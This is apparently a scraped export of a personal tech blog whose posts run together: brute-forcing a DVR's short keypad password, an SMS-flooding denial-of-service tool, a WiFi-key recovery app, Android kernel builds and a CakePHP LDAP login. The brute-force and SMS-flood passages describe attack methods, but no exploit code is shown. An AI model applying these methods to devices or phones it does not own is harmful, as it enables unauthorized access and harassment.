The administration password could be entered either over one of the remote management interfaces (the desktop client or web server) or physically on the devices keypad. The keypad had the buttons: [1], [2], [3], [4] and [ENTER]. Well isn\u0026rsquo;t that interesting; it looks as if the password can only be made up of at most 4 characters. And the desktop client nicely informs me that when entering a password it must be between 4 and 8 characters long, that leaves only 87,296 possibilities.\nSo, onto the next attack! Knowing that this device had such a limited amount of possible options for the password a brute force attack wouldn\u0026rsquo;t be bad at all. After spending a lot of time examining unsuccessful login attempts from the desktop client in Wireshark and understanding their proprietary protocol, I wrote my first useful python script to automate the process. After a few false positives and tweaks, I was able to get the program to generate a list of every possible password combination for the device and try them out. Within a minute of running I had the device\u0026rsquo;s long lost administration password of \u0026ldquo;1324\u0026rdquo; (It has since been changed).\nAfter logging in as the Administrator I was able to see that there were other accounts on the system as well. And my program worked equally well for all of them. However it is currently hard-coded to use the Administrator username. You may change it if you wish, but why bother? 😉\nAttached to this post is both the exploit and manual for the TRIPLEX DVRLink DVR468RW. I hope that either may be useful to someone. (In a law abiding way)\nDVR_exploit.py (Developed and tested with Python 3 running on Windows XP)\nThis article has been published in 2600 Magazine issue Spring 2013; Volume 30, Number one!\n","permalink":"https://lanrat.com/posts/triplex-dvrlink-dvr468rw-exploit/","summary":"\u003cp\u003eAt an internship I had a while ago one project assigned to me was to regain access to a CCTV security system which we had been locked out of for some years. (The previous manager left without leaving the password.)\u003c/p\u003e\n\u003cp\u003eThe DVR system was a TRIPLEX DVRLink DVR468RW, whatever that is. It seemed cheap; a small embedded computer with video in/out, a hard-drive and CD-RW drive for recording storage. The administration interface was accessed either by a web server running on the device or a desktop client you installed on your computer.\u003c/p\u003e","title":"TRIPLEX DVRLink DVR468RW Exploit"},{"content":" Update ActionBarSherlock is no longer necessary. The latest Google Support Library includes appcompat which is a better solution.\nActionBarSherlock is an Android support library designed to allow you to use the ActionBar which was introduced in Android 3.0 Honeycomb with older devices, back to Android 2.1 Eclair. This allows your applications to have a modern looking interface, even on older devices whose API does not support the new features.\nTo get started using ActionBarSherlock in Eclipse follow these steps.\nDownload ActionBarSherlock Visit http://actionbarsherlock.com to download and extract the latest version to a development directory. You will be including this directory as a library in your app.\nIn Eclipse choose File -\u0026gt; New -\u0026gt; Other and select \u0026ldquo;Android Project from Existing Code\u0026rdquo;. Select the \u0026ldquo;actionbarsherlock\u0026rdquo; folder withing the directory of the zip file you just extracted. Eclipse should detect the project and import it into your workspace.\nCreate a New Application If you are going to add the ActionBar to an existing application skip this step.\nCreate a new Android application. I recommend the lowest minimum SDK you can use for your application (no lower that API 7). And set the target SDK to the highest version you can support (ideally the newest Android version). Finish the rest of the new application wizard so that Eclipse shows you your newly created application.\nAdding ActionBarSherlock to the Application Right click the application project and select properties. Then in the Android section under Library select Add and choose actionbarsherlock. Select Apply and then OK.\nIf you get the error: Found 2 versions of android-support-v4.jar in the dependency list in the console output then delete android-support-v4.jar in your project\u0026rsquo;s libs directory.\nIn AndroidManifest.xml add the attribute android:theme=\u0026quot;@style/Theme.Sherlock\u0026quot; to the Application section. There is also Theme.Sherlock.Light,Theme.Sherlock.Light.DarkActionBar, Theme.Sherlock.Light.NoActionBar and Theme.Sherlock.NoActionBar.\nNow you need to update each Activity that you want the ActionBar to appear on. In each Activity import com.actionbarsherlock.app.SherlockListActivity and remove the import for android.app.Activity. Change the class to extend SherlockActivity instead of Activity.\nThe ActionBar can also replace application menus. To use the ActionBar for menus import com.actionbarsherlock.view.Menu and com.actionbarsherlock.view.MenuItem. And remove the imports for android.view.Menu, android.view.MenuInflater, and android.view.MenuItem. Inside onCreateOptionsMenu() replace getMenuInflater() with getSupportMenuInflater().\nYou will use an xml menu resource to define the ActionBar menu items just like you did for older Android menus; however items have some new options. Most importantly android:showAsAction. This defines whether the menu item is allowed to be shown on the dropdown menu if all the icons don\u0026rsquo;t fit on the action bar. It also allows you to display just the item\u0026rsquo;s icon, or display its title. Below is a sample ActionBar menu I use on WiFi Key Recovery.\n\u0026lt; ?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;utf-8\u0026#34;?\u0026gt; \u0026lt;menu xmlns:android=\u0026#34;http://schemas.android.com/apk/res/android\u0026#34;\u0026gt; \u0026lt;item android:id=\u0026#34;@+id/menu_backup\u0026#34; android:icon=\u0026#34;@drawable/ic_action_save\u0026#34; android:title=\u0026#34;@string/menu_backup\u0026#34; android:showAsAction=\u0026#34;always|withText\u0026#34;\u0026gt;\u0026lt;/item\u0026gt; \u0026lt;item android:id=\u0026#34;@+id/menu_refresh\u0026#34; android:title=\u0026#34;@string/menu_refresh\u0026#34; android:icon=\u0026#34;@drawable/ic_action_refresh\u0026#34; android:showAsAction=\u0026#34;ifRoom\u0026#34;\u0026gt;\u0026lt;/item\u0026gt; \u0026lt;item android:id=\u0026#34;@+id/menu_about\u0026#34; android:title=\u0026#34;@string/menu_about\u0026#34; android:icon=\u0026#34;@drawable/ic_action_about\u0026#34; android:showAsAction=\u0026#34;ifRoom\u0026#34;\u0026gt;\u0026lt;/item\u0026gt; \u0026lt;item android:id=\u0026#34;@+id/menu_settings\u0026#34; android:icon=\u0026#34;@drawable/ic_action_settings\u0026#34; android:title=\u0026#34;@string/menu_wifi_settings\u0026#34; android:showAsAction=\u0026#34;ifRoom\u0026#34;\u0026gt;\u0026lt;/item\u0026gt; \u0026lt;/menu\u0026gt; Bugs Sometimes the android-support-v4.jar included in ActionBarSherlock may cause problems when using some of the newer API calls. I\u0026rsquo;ve noticed this when creating notifications with multiple actions. To fix this copy android-support-v13.jar from your Android SDK folder into ActionBarSherlock\u0026rsquo;s or your project\u0026rsquo;s libs folder. It will detect both versions of the support library and use the newest one. You should only need to do this last step if this is causing issues as ActionBarSherlock will likely be updated and fix this in a future release.\n","permalink":"https://lanrat.com/posts/getting-started-with-actionbarsherlock/","summary":"\u003clink rel=\"stylesheet\" href=\"/css/vendors/admonitions.53cd9f8afa9d9a8ac09093f668df057bc6d0f4bbd0886f39991a7b99934a7432.css\" integrity=\"sha256-U82fivqdmorAkJP2aN8Fe8bQ9LvQiG85mRp7mZNKdDI=\" crossorigin=\"anonymous\"\u003e\n    \u003cdiv class=\"admonition info\"\u003e\n      \u003cdiv class=\"admonition-header\"\u003e\u003csvg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 512 512\"\u003e\u003cpath d=\"M256 512A256 256 0 1 0 256 0a256 256 0 1 0 0 512zM216 336l24 0 0-64-24 0c-13.3 0-24-10.7-24-24s10.7-24 24-24l48 0c13.3 0 24 10.7 24 24l0 88 8 0c13.3 0 24 10.7 24 24s-10.7 24-24 24l-80 0c-13.3 0-24-10.7-24-24s10.7-24 24-24zm40-208a32 32 0 1 1 0 64 32 32 0 1 1 0-64z\"/\u003e\u003c/svg\u003e\n        \u003cspan\u003eUpdate\u003c/span\u003e\n      \u003c/div\u003e\n      \u003cdiv class=\"admonition-content\"\u003e\n        \u003cp\u003eActionBarSherlock is no longer necessary. The latest Google Support Library includes \u003ca href=\"https://developer.android.com/topic/libraries/support-library/features.html\"\u003eappcompat\u003c/a\u003e which is a better solution.\u003c/p\u003e","title":"Getting Started with ActionBarSherlock"},{"content":"A while ago I was working on building a custom kernel for my Android phone. Once you get the source the compilation process is not as straightforward as I hoped. Here are the steps required to get from the kernel source to a flashable image for your phone.\nGet a copy of the build toolchain and Linux kernel for your device First download a copy of the pre-build toolchain from git.\ngit clone https://android.googlesource.com/platform/prebuilts/gcc/linux-x86/arm/arm-eabi-4.6 Then locate a copy of a kernel for your device. I used the CyanogenMod kernel for the tuna device which is the code-name for the hardware of the Galaxy Nexus. Alternatively you can get a kernel from the Android source website.\nDownload the kernel with git:\ngit clone https://github.com/CyanogenMod/android_kernel_samsung_tuna.git Build the kernel configuration file Change into the root directory of the kernel you just downloaded and run the following code:\nexport ARCH=arm export SUBARCH=arm export CROSS_COMPILE=/home/user/git/arm-eabi-4.4.3/bin/arm-eabi- make DEVICE_defconfig Replace the CROSS_COMPILE path with the path to where you cloned the toolkit repository and replace DEVICE_defconfig with the configuration name for the device you are using; I used tuna_defconfig. If you are using CyanogenMod then use cyanogenmod_DEVICE_defconfig. This will create a .config file with all the setting to compile the kernel with. You can edit the file with a text editor or run the following if you want to use a terminal GUI.\nmake menuconfig Compiling the kernel Now the kernel is ready to be compiled. To start the compilation process run:\nmake -j 4 -j 4 tells the compiler how many of your possessor\u0026rsquo;s cores to use for the compilation process. Since I have a quad core possessor I used 4, but you should change it to match your system. If you are unsure of what to use, use make with no options. This may take some time depending on the speed of your system, it took 20 minutes for me.\nOnce it is done if there are any kernel modules you want compiled for this kernel run:\nmake modules If everything went well and you got no errors then your kernel will be located at arch/arm/boot/zImage\nInstalling the Kernel In order to turn the zImage file into a flashable image for an Android device you can use koush\u0026rsquo;s AnyKernel utility.\nClone the AnyKernel repository and replace kernel/zImage with the one you just created. Also remove everything from the system directory and replace it with any kernel modules you created. NOTE: Some devices may require a modified version of AnyKernel to work. The Galaxy Nexus should use the AnyKernel form the Galaxy Nexus Project. If you are not using any special kernel modules then you can skip line 5. Otherwise the output of \u0026ldquo;make modules\u0026rdquo; should tell you where to copy the modules from.\ngit clone https://github.com/Galaxy-Nexus-Project/AnyKernel.git cd AnyKernel cp ../android_kernel_samsung_tuna/arch/arm/boot/zImage kernel/zImage rm system/lib/modules/* cp PATH_TO_COMPILED_MODULES system/lib/modules/ zip -r9 newKernel.zip * The newKernel.zip you just created should now install your new kernel and modules on your device. Note: if your recovery requires zips to be signed then you will need to sign it before it will work.\n","permalink":"https://lanrat.com/posts/how-to-compile-a-linux-kernel-for-android/","summary":"\u003cp\u003eA while ago I was working on building a custom kernel for my Android phone. Once you get the source the compilation process is not as straightforward as I hoped. Here are the steps required to get from the kernel source to a flashable image for your phone.\u003c/p\u003e\n\u003ch2 id=\"get-a-copy-of-the-build-toolchain-and-linux-kernel-for-your-device\"\u003eGet a copy of the build toolchain and Linux kernel for your device\u003c/h2\u003e\n\u003cp\u003eFirst download a copy of the pre-build toolchain from git.\u003c/p\u003e","title":"How to Compile a Linux Kernel for Android"},{"content":"\nBy default CrunchBang Linux does not have hibernation support enabled in the shutdown menu. The reason for being excluded is likely because not all computers support hibernation. However most modern computers will support it.\nTo add a hibernation option just download this file and place it in the bin directory of your home folder: \u0026ldquo;~/bin/\u0026rdquo; and make it executable with:\nchmod +x cb-exit cb-exit Gist\nIf you want to test your system to see if it can handle hibernation run the following command. If your system supports it you should be able to successfully enter and exit hibernation:\ndbus-send --system --print-reply --dest=\\\u0026#34;org.freedesktop.UPower\\\u0026#34; /org/freedesktop/UPower org.freedesktop.UPower.Hibernate ","permalink":"https://lanrat.com/posts/adding-hibernate-to-crunchbang/","summary":"\u003cp\u003e\u003cimg alt=\"cb-exit\" loading=\"lazy\" src=\"/posts/adding-hibernate-to-crunchbang/images/cb-exit.webp\"\u003e\u003c/p\u003e\n\u003cp\u003eBy default \u003ca href=\"https://crunchbang.org/\"\u003eCrunchBang Linux\u003c/a\u003e does not have hibernation support enabled in the shutdown menu. The reason for being excluded is likely because not all computers support hibernation. However most modern computers will support it.\u003c/p\u003e\n\u003cp\u003eTo add a hibernation option just download \u003ca href=\"https://gist.github.com/lanrat/5650237\"\u003ethis\u003c/a\u003e file and place it in the bin directory of your home folder: \u0026ldquo;~/bin/\u0026rdquo; and make it executable with:\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-shell\" data-lang=\"shell\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003echmod +x cb-exit\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003ca href=\"https://gist.github.com/lanrat/5650237\"\u003ecb-exit Gist\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eIf you want to test your system to see if it can handle hibernation run the following command. If your system supports it you should be able to successfully enter and exit hibernation:\u003c/p\u003e","title":"Adding Hibernate to the CrunchBang Linux shutdown menu"},{"content":"\nA while ago I decided that I needed some more JavaScript/AJAX experience, and what better way to get it than to use it to solve an existing problem.\nEvery now and then my apartment hosts karaoke nights, we have a lot of songs, enough to fill a 4-inch binder. Searching for songs was a pain. In order to find the song\u0026rsquo;s ID code to give to the DJ you must search through pages of songs and artists that were in no particular order. I decided to fix this problem with my skill set, so I created DJQueue. DJQueue is a collection of hacked together PHP, JavaScript, and SQL magic.\nSince most party attendees have a smartphone, the interface is entirely mobile. Users can choose their own alias, which often is not their real name; especially if they are … not so good. From there on searching and enqueueing songs stored in the database is all AJAX. As guests search the song list and select songs they want they are added the the current queue and the new song appears on a separate interface for the DJ.\nAll code is open source and freely available on Github!\n","permalink":"https://lanrat.com/posts/dj-queue/","summary":"\u003cp\u003e\u003cimg alt=\"queue_screenshot\" loading=\"lazy\" src=\"/posts/dj-queue/images/karaoke-queue-screenshot.webp\"\u003e\u003c/p\u003e\n\u003cp\u003eA while ago I decided that I needed some more JavaScript/AJAX experience, and what better way to get it than to use it to solve an existing problem.\u003c/p\u003e\n\u003cp\u003eEvery now and then my apartment hosts karaoke nights, we have a lot of songs, enough to fill a 4-inch binder. Searching for songs was a pain. In order to find the song\u0026rsquo;s ID code to give to the DJ you must search through pages of songs and artists that were in no particular order. I decided to fix this problem with my skill set, so I created \u003ca href=\"https://github.com/lanrat/DJ_Queue\"\u003eDJQueue\u003c/a\u003e. \u003ca href=\"https://github.com/lanrat/DJ_Queue\"\u003eDJQueue\u003c/a\u003e is a collection of hacked together PHP, JavaScript, and SQL magic.\u003c/p\u003e","title":"PHP Karaoke Queue"},{"content":"WiFi Recovery is an Android application that retrieves saved WiFi passwords from the device\u0026rsquo;s system files. The app requires root access to read the wpa_supplicant.conf file where Android stores network credentials in plain text format.\nThe application uses libraries including ActionBarSherlock, ZXING for QR code generation, and RootTools for system-level file access. It provides a simple interface to view saved network passwords and can generate QR codes for easy network sharing. The project has been archived as modern Android versions have changed WiFi credential storage mechanisms.\n","permalink":"https://lanrat.com/projects/wifi-recovery/","summary":"\u003cp\u003eWiFi Recovery is an Android application that retrieves saved WiFi passwords from the device\u0026rsquo;s system files. The app requires root access to read the wpa_supplicant.conf file where Android stores network credentials in plain text format.\u003c/p\u003e\n\u003cp\u003eThe application uses libraries including ActionBarSherlock, ZXING for QR code generation, and RootTools for system-level file access. It provides a simple interface to view saved network passwords and can generate QR codes for easy network sharing. The project has been archived as modern Android versions have changed WiFi credential storage mechanisms.\u003c/p\u003e","title":"WiFi Recovery"},{"content":"\nA while ago I wondered how well modern cellphones could handle a flood of text messages. So I created a simple python program to test just that. The program works by sending emails to a SMS Gateway which will forward the message to the phone in the form of a text message.\nI tested my program on two devices, my modern HTC Incredible running Android and my aging LG Chocolate dumb-phone. The results where surprising! After starting the program my HTC Incredible froze after receiving the first 20 messages. A battery pull was required to get it to respond. The second it finished booting it froze again! I was only able to make it respond by stopping my program and rebooting the phone. After it boot it froze again while catching up on all the messages that where sent.\nMy LG Chocolate was another story. While it never froze, it did make the phone almost impossible to use. 10 times a second it would display a notification of the new message. But after about 100 messages it just stopped. My program was still sending them but the phone stopped receiving them. I\u0026rsquo;m not sure if this was done by the phone itself or something on the carrier\u0026rsquo;s end.\nI am releasing the source of this program in case others find it interesting. I claim no responsibility for any damage done by this program. Use at your own risk on devices you own!\nSource Code at GitHub\nSMS DOS requires PyQt4 for the GUI, it can be installed from Riverbank Computing.\n","permalink":"https://lanrat.com/posts/sms-dos/","summary":"\u003cp\u003e\u003cimg alt=\"SMS DOS Screenshot\" loading=\"lazy\" src=\"/posts/sms-dos/images/SMSDOS_Screenshot.webp\"\u003e\u003c/p\u003e\n\u003cp\u003eA while ago I wondered how well modern cellphones could handle a flood of text messages. So I created a simple python program to test just that. The program works by sending emails to a \u003ca href=\"https://en.wikipedia.org/wiki/SMS_gateway\"\u003eSMS Gateway\u003c/a\u003e which will forward the message to the phone in the form of a text message.\u003c/p\u003e\n\u003cp\u003eI tested my program on two devices, my modern HTC Incredible running Android and my aging LG Chocolate dumb-phone. The results where surprising! After starting the program my HTC Incredible froze after receiving the first 20 messages. A battery pull was required to get it to respond. The second it finished booting it froze again! I was only able to make it respond by stopping my program and rebooting the phone. After it boot it froze again while catching up on all the messages that where sent.\u003c/p\u003e","title":"SMS DOS: Cellphone Denial Of Service via text messages"},{"content":"\nHave you ever wanted to give a friend access to a wireless network you are on but don\u0026rsquo;t want to go find the key?\nWIFI Key Recovery will find the key on your device and allow you to share it via a message or QR Code.\nAdditionally WIFI Key Recovery will allow you to backup/restore your current WIFI configuration to your SD card!\nIf this app does not work on your rooted phone email me I will try to add support.\nAll application code is open source and available on GitHub!\n","permalink":"https://lanrat.com/posts/wifi-recovery-for-android/","summary":"\u003cp\u003e\u003cimg alt=\"WiFi Recovery\" loading=\"lazy\" src=\"/posts/wifi-recovery-for-android/images/wifirecovery.webp\"\u003e\u003c/p\u003e\n\u003cp\u003eHave you ever wanted to give a friend access to a wireless network you are on but don\u0026rsquo;t want to go find the key?\u003c/p\u003e\n\u003cp\u003eWIFI Key Recovery will find the key on your device and allow you to share it via a message or QR Code.\u003cbr\u003e\nAdditionally WIFI Key Recovery will allow you to backup/restore your current WIFI configuration to your SD card!\u003c/p\u003e\n\u003cp\u003eIf this app does not work on your rooted phone email me I will try to add support.\u003c/p\u003e","title":"WIFI Recovery for Android"},{"content":"DNS.coffee is a web platform that collects and archives DNS zone file statistics to provide insights into DNS growth and changes over time. The service tracks domain distribution across zones, TLD root zone growth patterns, and overall internet domain expansion through comprehensive data visualization.\nThe platform includes tools for domain record searches, nameserver lookups, IP information queries, and advanced search capabilities. DNS.coffee also provides an API for programmatic access to DNS data, making it a valuable resource for researchers and network administrators analyzing DNS infrastructure trends and domain name system evolution.\n","permalink":"https://lanrat.com/projects/dns.coffee/","summary":"\u003cp\u003eDNS.coffee is a web platform that collects and archives DNS zone file statistics to provide insights into DNS growth and changes over time. The service tracks domain distribution across zones, TLD root zone growth patterns, and overall internet domain expansion through comprehensive data visualization.\u003c/p\u003e\n\u003cp\u003eThe platform includes tools for domain record searches, nameserver lookups, IP information queries, and advanced search capabilities. DNS.coffee also provides an API for programmatic access to DNS data, making it a valuable resource for researchers and network administrators analyzing DNS infrastructure trends and domain name system evolution.\u003c/p\u003e","title":"DNS.coffee"},{"content":"This article is going to help you using LDAP to authenticate users rather than relying on a users table with a password column. I will be assuming you will be using cakephp 1.3 and that you have completed Auth and/or ACL setup on your application similar to the ACL tutorial on the cakephp book.\nBecause we want to control the logging in of the user ourselves and not leave it to the cake magic we need to override the auth component. To do this copy your auth.php from your CAKE_CORE/controllers/components/ to your APP/controllers/components/ folder. Next open it up and fine the login function. It should be around like 684. Once you find it comment out everything inside the function, but leave the function intact. It should look something like this:\nfunction login($data = null) { /*$this-\u0026gt;__setDefaults(); $this-\u0026gt;_loggedIn = false; if (empty($data)) {$data = $this-\u0026gt;data; } if ($user = $this-\u0026gt;identify($data)) { $this-\u0026gt;Session-\u0026gt;write($this-\u0026gt;sessionKey, $user); $this-\u0026gt;_loggedIn = true; } return $this-\u0026gt;_loggedIn;*/ } Next open up your users controller and find your login function. Assuming you followed the guide or have implemented some basic auth you should have an empty login function.\nI have written a LDAP helper that can easily be included as a LIB for Cakephp that will get some user data and validate the login, copy and paste it from below to APP/libs/ldap.php\n\u0026lt;?php class ldap{ private $ldap = null; private $ldapServer = \u0026#39;AD.domain.com\u0026#39;; private $ldapPort = \u0026#39;389\u0026#39;; public $suffix = \u0026#39;@domain.com\u0026#39;; public $baseDN = \u0026#39;dc=domain,dc=com\u0026#39;; private $ldapUser = \u0026#39;LDAPUser\u0026#39;; private $ldapPassword = \u0026#39;Pas5w0rd\u0026#39;; public function __construct() { $this-\u0026gt;ldap = ldap_connect($this-\u0026gt;ldapServer,$this-\u0026gt;ldapPort); //these next two lines are required for windows server 03 ldap_set_option($this-\u0026gt;ldap, LDAP_OPT_REFERRALS, 0); ldap_set_option($this-\u0026gt;ldap, LDAP_OPT_PROTOCOL_VERSION, 3); } public function auth($user,$pass) { if (empty($user) or empty($pass)) { return false; } @$good = ldap_bind($this-\u0026gt;ldap,$user.$this-\u0026gt;suffix,$pass); if( $good === true ){ return true; }else{ return false; } } public function __destruct(){ ldap_unbind($this-\u0026gt;ldap); } public function getInfo($user){ $username = $user.$this-\u0026gt;suffix;; $attributes = array(\u0026#39;givenName\u0026#39;,\u0026#39;sn\u0026#39;,\u0026#39;mail\u0026#39;,\u0026#39;samaccountname\u0026#39;,\u0026#39;memberof\u0026#39;); $filter = \u0026#34;(userPrincipalName=$username)\u0026#34;; ldap_bind($this-\u0026gt;ldap,$this-\u0026gt;ldapUser.$this-\u0026gt;suffix,$this-\u0026gt;ldapPassword); $result = ldap_search($this-\u0026gt;ldap, $this-\u0026gt;baseDN, $filter,$attributes); $entries = ldap_get_entries($this-\u0026gt;ldap, $result); return $this-\u0026gt;formatInfo($entries); } private function formatInfo($array){ $info = array(); $info[\u0026#39;first_name\u0026#39;] = $array[0][\u0026#39;givenname\u0026#39;][0]; $info[\u0026#39;last_name\u0026#39;] = $array[0][\u0026#39;sn\u0026#39;][0]; $info[\u0026#39;name\u0026#39;] = $info[\u0026#39;first_name\u0026#39;] .\u0026#39; \u0026#39;. $info[\u0026#39;last_name\u0026#39;]; $info[\u0026#39;email\u0026#39;] = $array[0][\u0026#39;mail\u0026#39;][0]; $info[\u0026#39;user\u0026#39;] = $array[0][\u0026#39;samaccountname\u0026#39;][0]; $info[\u0026#39;groups\u0026#39;] = $this-\u0026gt;groups($array[0][\u0026#39;memberof\u0026#39;]); return $info; } private function groups($array) { $groups = array(); $tmp = array(); foreach( $array as $entry ) { $tmp = array_merge($tmp,explode(\u0026#39;,\u0026#39;,$entry)); } foreach($tmp as $value) { if( substr($value,0,2) == \u0026#39;CN\u0026#39; ){ $groups[] = substr($value,3); } } return $groups; } } ?\u0026gt; Edit the variables at the tom of the file to reflect your setup.\nNow we are going to make our Users-\u0026gt;login function check the POST username and password against LDAP, and then if valid it will preform the login magic that auth used to do.\nFill your login function with this:\nfunction login() { App::import(\u0026#39;Lib\u0026#39;, \u0026#39;ldap\u0026#39;); if ($this-\u0026gt;Session-\u0026gt;read(\u0026#39;Auth.User\u0026#39;)) { $this-\u0026gt;redirect(array(\u0026#39;controller\u0026#39; =\u0026gt; \u0026#39;allocations\u0026#39;, \u0026#39;action\u0026#39; =\u0026gt; \u0026#39;index\u0026#39;)); } elseif (!empty($this-\u0026gt;data)) { $ldap = new ldap; if ($ldap-\u0026gt;auth($this-\u0026gt;Auth-\u0026gt;data[\u0026#39;User\u0026#39;][\u0026#39;user\u0026#39;], $this-\u0026gt;Auth-\u0026gt;data[\u0026#39;User\u0026#39;][\u0026#39;password\u0026#39;])) { $userrow = $this-\u0026gt;User-\u0026gt;findByUsername($this-\u0026gt;data[\u0026#39;User\u0026#39;][\u0026#39;user\u0026#39;]); if (!$userrow) { $ldap_info = $ldap-\u0026gt;getInfo($this-\u0026gt;data[\u0026#39;User\u0026#39;][\u0026#39;user\u0026#39;]); $this-\u0026gt;data[\u0026#39;User\u0026#39;][\u0026#39;username\u0026#39;] = $this-\u0026gt;data[\u0026#39;User\u0026#39;][\u0026#39;user\u0026#39;]; $this-\u0026gt;data[\u0026#39;User\u0026#39;][\u0026#39;name\u0026#39;] = $ldap_info[\u0026#39;name\u0026#39;]; $this-\u0026gt;data[\u0026#39;User\u0026#39;][\u0026#39;group_id\u0026#39;] = 3; //sets the default group $this-\u0026gt;add(); $userrow = $this-\u0026gt;User-\u0026gt;findByUsername($this-\u0026gt;data[\u0026#39;User\u0026#39;][\u0026#39;user\u0026#39;]); } $user = $userrow[\u0026#39;User\u0026#39;]; $this-\u0026gt;Auth-\u0026gt;Session-\u0026gt;write($this-\u0026gt;Auth-\u0026gt;sessionKey, $user); $this-\u0026gt;Auth-\u0026gt;_loggedIn = true; $this-\u0026gt;Session-\u0026gt;setFlash(\u0026#39;You are logged in!\u0026#39;); $this-\u0026gt;redirect(array(\u0026#39;controller\u0026#39; =\u0026gt; \u0026#39;allocations\u0026#39;, \u0026#39;action\u0026#39; =\u0026gt; \u0026#39;index\u0026#39;)); } else { $this-\u0026gt;Session-\u0026gt;setFlash(__(\u0026#39;Login Failed\u0026#39;, true)); } } } To quickly summarize, it first checks to see if the user is logged in, if not, and post data is provided it will check the provided credentials with the LDAP Lib. If valid it then attempts to get the user from the users table, if the user does not exist it creates it with information provided from LDAP and defaults set in the function.\nI built this to still work with a users table to allow relationships between other models and users. but it can be used without a users table, just remove the if(!$userrow) statement and the line before it.\nNote If you use a users table, you do not need, and should not have, a password column.\nThat should be it! You should now be using LDAP for user credential validation.\n","permalink":"https://lanrat.com/posts/ldap-authentication-for-cakephp/","summary":"\u003cp\u003eThis article is going to help you using LDAP to authenticate users rather than relying on a users table with a password column. I will be assuming you will be using cakephp 1.3 and that you have completed Auth and/or ACL setup on your application similar to the \u003ca href=\"https://book.cakephp.org/view/1543/Simple-Acl-controlled-Application\"\u003eACL tutorial on the cakephp book\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eBecause we want to control the logging in of the user ourselves and not leave it to the cake magic we need to override the auth component. To do this copy your auth.php from your \u003ccode\u003eCAKE_CORE/controllers/components/\u003c/code\u003e to your \u003ccode\u003eAPP/controllers/components/\u003c/code\u003e folder. Next open it up and fine the login function. It should be around like 684. Once you find it comment out everything inside the function, but leave the function intact. It should look something like this:\u003c/p\u003e","title":"LDAP Authentication for Cakephp"},{"content":"Backstory A few years ago when the local Circuit City was going out of business I decided to stop by to see if there where any good deals. Unfortunately most of their inventory was at a very low discount (if at all). However they where getting rid of some of their CRM and sales equipment. I picked up a 3M touch-panel LCD monitor for $20 or so, sold \u0026ldquo;as-is\u0026rdquo;. When I got home I realized that the LCD panel was only 800x600px, and had a broken back-light. I tried to get the touch panel working but for some reason it was not receiving power and I could not find any drivers for it. Into storage it went.\nA few months later I dusted it off and decided to give it another try. I was able to find a way of providing 5v power to the controller board for the touch panel, and after much searching I found the drivers.\nThe Hardware Once I got the driver, power to the board, and figured out its serial connection it was surprisingly easy to get working. Below you can see a picture and video of the touch panel wired up and working on a laptop.\nThe next step was to remove the glass touch panel from the broken LCD. The glass was only held on by some very strong adhesive. After carefully removing it I tested it to make sure everything was still in good working order.\nNow is when the fun starts! I picked up a picture frame that used a piece of glass the exact same size of the touch panel from a local arts and crafts store. I also found a old Pentium M laptop I would be modifying to use the touch panel on its screen with the picture frame.\nBelow you can see the touch panel in the picture-frame, and the laptop I would be using for this project with its screen removed and the touch-panel attached by its side.\nI gutted the laptop of unneeded parts, such as the keyboard, mouse, DVD drive, and lots of other plastic bits that would be in the way or covered up. Then I reattached its screen backwards, so that when it folds down it faces up.\nI mounted the touch panel\u0026rsquo;s controller board where the DVD drive once was, and gave it 5v of power from the laptop\u0026rsquo;s USB ports. Below you can see the picture-frame resting on the laptop but not attached yet, and the wiring for the touch-panel.\nNow for the inside wiring!\nAs you can see I used hot glue to hold the controller board in the optical drive bay. And all the wiring was looking good. I just needed a way to mount the touch-panel/picture frame to the rest of the laptop.\nAnd here was my solution:\nI would use these bent metal brackets I picked up at home depot to secure them together.\nAt this point everything was working great. I should probably mention what those blue wires are that you can see sticking out of it. They lead to the laptop\u0026rsquo;s power and standby buttons. Those buttons would normally be located right above the keyboard, however with this mod they are no longer assessable, so they will be relocated.\nI mounted the power and standby buttons (seen above) on a piece of plastic from the LCD assembly. I placed it over the hole in the laptop where the outside of the DVD drive was.\nThis concludes the hardware portion of this mod.\nThe Software To make the interface more touch friendly I installed RockerDock to make launching application nicer.\nAlso since there is no longer a keyboard I used the Touch-It Virtual Keyboard to replace key input. I like this keyboard because it can hide easily and not take up any screen real estate when you need it.\nIf anyone reading this needs the driver for their 3M MT7 touch panel, or If I ever need the link for the driver, here is that too: https://solutions.3m.com/wps/portal/3M/en_US/TouchSystems/TouchScreen/CustomerSupport/TouchScreenDrivers/\nIn addition to the utilities above, I also Installed XBMC, which acts as a perfect picture displaying software. and with UPNP/DNLA I can control it from my phone, and even wirelessly display photos from my phone on it via my network.\n","permalink":"https://lanrat.com/posts/picture-frame-tablet-pc/","summary":"\u003ch2 id=\"backstory\"\u003eBackstory\u003c/h2\u003e\n\u003cp\u003eA few years ago when the local Circuit City was going out of business I decided to stop by to see if there where any good deals. Unfortunately most of their inventory was at a very low discount (if at all). However they where getting rid of some of their CRM and sales equipment. I picked up a 3M touch-panel LCD monitor for $20 or so, sold \u0026ldquo;as-is\u0026rdquo;. When I got home I realized that the LCD panel was only 800x600px, and had a broken back-light. I tried to get the touch panel working but for some reason it was not receiving power and I could not find any drivers for it. Into storage it went.\u003c/p\u003e","title":"Picture Frame Tablet PC"},{"content":"This is about a piece of software I wrote over a year ago to fit a need I had at the time. It probably will not receive any updates but I have released the source to anyone is free to do as they please with it.\nBackground PHPRepo is a PHP CMS for managing Debian package repositories. A while ago I wanted to start my own repository for some of my own packages, so I looked for an easy way to do this. I found none. At the time the only way to run and manage a Debian package repository was through apt at the command line, and since at the time I was learning PHP I decided to write my own software to fill this void. Thus I created PHPRepo. PHPRepo has very minimal requirements and can work alongside an existing repository that is managed with apt.\nInstallation Installation is as easy as it gets for a PHP app. There are no databases to configure, as it used the Debian repository files as its database. Simply upload the phprepo files to the root of your web-server and edit the config file with a user name and password you wish to use.\nAlso, if you want the ability to manage the repository in addition to view it in your web browser then make sure the user on your server that the web-server is running under has read and write permission to the repository files.\nScreenshot Tour My screenshots are for a repository that already has a few packages in it. If you are making a repository from 